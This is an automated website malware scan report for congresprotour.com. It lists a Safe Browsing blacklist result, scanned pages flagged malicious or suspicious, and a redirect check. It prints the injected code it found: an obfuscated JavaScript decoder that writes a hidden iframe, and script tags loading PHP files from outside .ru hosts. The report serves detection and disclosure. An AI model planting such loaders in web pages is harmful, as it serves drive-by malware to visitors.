Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=congresprotour.com
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://congresprotour.com/ | 200 OK Content-Length: 6871 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
<!-- function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!111!109!97!110!115!101!120!115!104!97!116!46!98!105!122!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
Antivirus reports:
http://congresprotour.com/index-2.html | 200 OK Content-Length: 6314 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://kpo-marketru.122.com1.ru/wy84gznd.php?id=69082309"></script>
http://congresprotour.com/incentives.html | 200 OK Content-Length: 5786 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://kpo-marketru.122.com1.ru/wy84gznd.php?id=69082308"></script>
http://congresprotour.com/congres3.html | 200 OK Content-Length: 6838 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://kpo-marketru.122.com1.ru/wy84gznd.php?id=69082306"></script>
http://congresprotour.com/congres4.html | 200 OK Content-Length: 5893 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://kpo-marketru.122.com1.ru/wy84gznd.php?id=69082307"></script>
http://congresprotour.com/eng/index.html | 200 OK Content-Length: 6036 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082338"></script>
http://congresprotour.com/eng/ | 200 OK Content-Length: 6036 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082338"></script>
http://congresprotour.com/eng/incentives.html | 200 OK Content-Length: 5591 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082337"></script>
http://congresprotour.com/eng/congres3.html | 200 OK Content-Length: 6327 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082334"></script>
http://congresprotour.com/eng/congres4.html | 200 OK Content-Length: 5707 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://cdod-hosta.ru/zbqp3nfc.php?id=69082335"></script>
http://congresprotour.com/test404page.js | 404 Not Found Content-Length: 964 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: congresprotour.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 02:29:31 GMT
Accept-Ranges: bytes
ETag: "8010ab-1ad7-509d54021a75f"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6871
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 04:39:52 GMT
X-Powered-By: PleskLin
...6871 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: congresprotour.com
Referer: http://www.google.com/search?q=congresprotour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.